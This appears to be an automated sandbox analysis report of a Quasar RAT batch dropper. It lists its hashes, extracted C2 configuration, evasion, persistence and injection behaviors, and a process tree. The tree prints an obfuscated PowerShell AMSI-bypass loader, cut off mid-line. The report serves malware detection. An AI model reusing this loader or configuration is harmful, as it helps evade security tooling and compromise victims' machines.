Analysis
-
max time kernel
84s -
max time network
92s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-05-2024 19:38
Static task
static1
Behavioral task
behavioral1
Sample
$77-Built.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
$77-Built.bat
Resource
win10v2004-20240508-en
General
-
Target
$77-Built.bat
-
Size
3.5MB
-
MD5
297d7e65305917b5a212ca9f4b4d99d2
-
SHA1
402192fd3b13ea1fd26403e227ceb119e8569b4c
-
SHA256
cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
-
SHA512
6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
SSDEEP
49152:cYbGAyBfhKnc19015vyfIchfKpcuGj8RmSMvANLFt/X9oS4ot3X3tLdDh:cG
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
1.4.1
Rootkit
uk2.localto.net:3444
13b8023a-5596-4efa-b088-c87d2ca4e84f
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/3432-14-0x0000024FFE190000-0x0000024FFE62E000-memory.dmp family_quasar behavioral3/memory/2276-52-0x000001E8F0690000-0x000001E8F09B4000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\Client-built.exe family_quasar behavioral3/memory/2348-70-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1216 created 636 1216 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 1820 powershell.exe 2276 powershell.exe 3432 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeClient-built.exe$77-powershell.exe$77-powershell.exepid process 2040 Install.exe 2348 Client-built.exe 2908 $77-powershell.exe 4484 $77-powershell.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Discord svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1216 set thread context of 4812 1216 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3132 schtasks.exe 1324 schtasks.exe 236 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$77-powershell.exeClient-built.exepowershell.EXEdllhost.exepid process 3432 powershell.exe 3432 powershell.exe 1820 powershell.exe 1820 powershell.exe 2276 powershell.exe 2276 powershell.exe 2908 $77-powershell.exe 2348 Client-built.exe 1216 powershell.EXE 1216 powershell.EXE 1216 powershell.EXE 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 2276 powershell.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe 4812 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeIncreaseQuotaPrivilege 1820 powershell.exe Token: SeSecurityPrivilege 1820 powershell.exe Token: SeTakeOwnershipPrivilege 1820 powershell.exe Token: SeLoadDriverPrivilege 1820 powershell.exe Token: SeSystemProfilePrivilege 1820 powershell.exe Token: SeSystemtimePrivilege 1820 powershell.exe Token: SeProfSingleProcessPrivilege 1820 powershell.exe Token: SeIncBasePriorityPrivilege 1820 powershell.exe Token: SeCreatePagefilePrivilege 1820 powershell.exe Token: SeBackupPrivilege 1820 powershell.exe Token: SeRestorePrivilege 1820 powershell.exe Token: SeShutdownPrivilege 1820 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeSystemEnvironmentPrivilege 1820 powershell.exe Token: SeRemoteShutdownPrivilege 1820 powershell.exe Token: SeUndockPrivilege 1820 powershell.exe Token: SeManageVolumePrivilege 1820 powershell.exe Token: 33 1820 powershell.exe Token: 34 1820 powershell.exe Token: 35 1820 powershell.exe Token: 36 1820 powershell.exe Token: SeIncreaseQuotaPrivilege 1820 powershell.exe Token: SeSecurityPrivilege 1820 powershell.exe Token: SeTakeOwnershipPrivilege 1820 powershell.exe Token: SeLoadDriverPrivilege 1820 powershell.exe Token: SeSystemProfilePrivilege 1820 powershell.exe Token: SeSystemtimePrivilege 1820 powershell.exe Token: SeProfSingleProcessPrivilege 1820 powershell.exe Token: SeIncBasePriorityPrivilege 1820 powershell.exe Token: SeCreatePagefilePrivilege 1820 powershell.exe Token: SeBackupPrivilege 1820 powershell.exe Token: SeRestorePrivilege 1820 powershell.exe Token: SeShutdownPrivilege 1820 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeSystemEnvironmentPrivilege 1820 powershell.exe Token: SeRemoteShutdownPrivilege 1820 powershell.exe Token: SeUndockPrivilege 1820 powershell.exe Token: SeManageVolumePrivilege 1820 powershell.exe Token: 33 1820 powershell.exe Token: 34 1820 powershell.exe Token: 35 1820 powershell.exe Token: 36 1820 powershell.exe Token: SeIncreaseQuotaPrivilege 1820 powershell.exe Token: SeSecurityPrivilege 1820 powershell.exe Token: SeTakeOwnershipPrivilege 1820 powershell.exe Token: SeLoadDriverPrivilege 1820 powershell.exe Token: SeSystemProfilePrivilege 1820 powershell.exe Token: SeSystemtimePrivilege 1820 powershell.exe Token: SeProfSingleProcessPrivilege 1820 powershell.exe Token: SeIncBasePriorityPrivilege 1820 powershell.exe Token: SeCreatePagefilePrivilege 1820 powershell.exe Token: SeBackupPrivilege 1820 powershell.exe Token: SeRestorePrivilege 1820 powershell.exe Token: SeShutdownPrivilege 1820 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeSystemEnvironmentPrivilege 1820 powershell.exe Token: SeRemoteShutdownPrivilege 1820 powershell.exe Token: SeUndockPrivilege 1820 powershell.exe Token: SeManageVolumePrivilege 1820 powershell.exe Token: 33 1820 powershell.exe Token: 34 1820 powershell.exe Token: 35 1820 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$77-powershell.exepid process 4484 $77-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1828 wrote to memory of 3432 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 3432 1828 cmd.exe powershell.exe PID 3432 wrote to memory of 1820 3432 powershell.exe powershell.exe PID 3432 wrote to memory of 1820 3432 powershell.exe powershell.exe PID 3432 wrote to memory of 1036 3432 powershell.exe WScript.exe PID 3432 wrote to memory of 1036 3432 powershell.exe WScript.exe PID 1036 wrote to memory of 3244 1036 WScript.exe cmd.exe PID 1036 wrote to memory of 3244 1036 WScript.exe cmd.exe PID 3244 wrote to memory of 2276 3244 cmd.exe powershell.exe PID 3244 wrote to memory of 2276 3244 cmd.exe powershell.exe PID 2276 wrote to memory of 2040 2276 powershell.exe Install.exe PID 2276 wrote to memory of 2040 2276 powershell.exe Install.exe PID 2276 wrote to memory of 2040 2276 powershell.exe Install.exe PID 2276 wrote to memory of 2348 2276 powershell.exe Client-built.exe PID 2276 wrote to memory of 2348 2276 powershell.exe Client-built.exe PID 2276 wrote to memory of 3132 2276 powershell.exe schtasks.exe PID 2276 wrote to memory of 3132 2276 powershell.exe schtasks.exe PID 2276 wrote to memory of 2908 2276 powershell.exe $77-powershell.exe PID 2276 wrote to memory of 2908 2276 powershell.exe $77-powershell.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 1216 wrote to memory of 4812 1216 powershell.EXE dllhost.exe PID 4812 wrote to memory of 636 4812 dllhost.exe winlogon.exe PID 4812 wrote to memory of 688 4812 dllhost.exe lsass.exe PID 4812 wrote to memory of 996 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 480 4812 dllhost.exe dwm.exe PID 4812 wrote to memory of 708 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 892 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1076 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1092 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1208 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1236 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1288 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1352 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1372 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1400 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1496 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1604 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1620 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1732 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1752 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1772 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1812 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1856 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1872 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 1896 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2008 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2024 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2080 4812 dllhost.exe spoolsv.exe PID 4812 wrote to memory of 2248 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2420 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2528 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2536 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2568 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2620 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2640 4812 dllhost.exe sysmon.exe PID 4812 wrote to memory of 2672 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2684 4812 dllhost.exe svchost.exe PID 4812 wrote to memory of 2692 4812 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:480
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d0e1e1b-373a-41dd-8190-56b351c2d29f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4812
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:892
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uIvxZJgMzRFV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MXwaypawbVpDpJ,[Parameter(Position=1)][Type]$caNhasgXfq)$KwbzrUESPiA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'Mo'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+'l'+[Char](97)+'s'+[Char](115)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$KwbzrUESPiA.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MXwaypawbVpDpJ).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+'nage'+'d'+'');$KwbzrUESPiA.DefineMethod('I'+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+'t'+','+''+[Char](86)+'i'+'r'+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$caNhasgXfq,$MXwaypawbVpDpJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+','+'Mana'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $KwbzrUESPiA.CreateType();}$zXWEPPVhltgoN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$mbfNlwcrfCyGlW=$zXWEPPVhltgoN.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+'c'+[Char](44)+'S'+[Char](116)+''+'a'+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rtgfsHTYUmKiWdpJilb=uIvxZJgMzRFV @([String])([IntPtr]);$nmTXiHraRxyuNrsxHygMxo=uIvxZJgMzRFV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KJXtXOjvOOj=$zXWEPPVhltgoN.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'an'+'d'+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$KipVnQpQOYKyLG=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$KJXtXOjvOOj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$cEMOwqEkWnRqgIEje=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$KJXtXOjvOOj,[Object]('Vi'+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+'t')));$TdgMYXu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KipVnQpQOYKyLG,$rtgfsHTYUmKiWdpJilb).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+'l');$nwXnGwTDdBlftMyts=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$TdgMYXu,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$HqnVkxuGKl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cEMOwqEkWnRqgIEje,$nmTXiHraRxy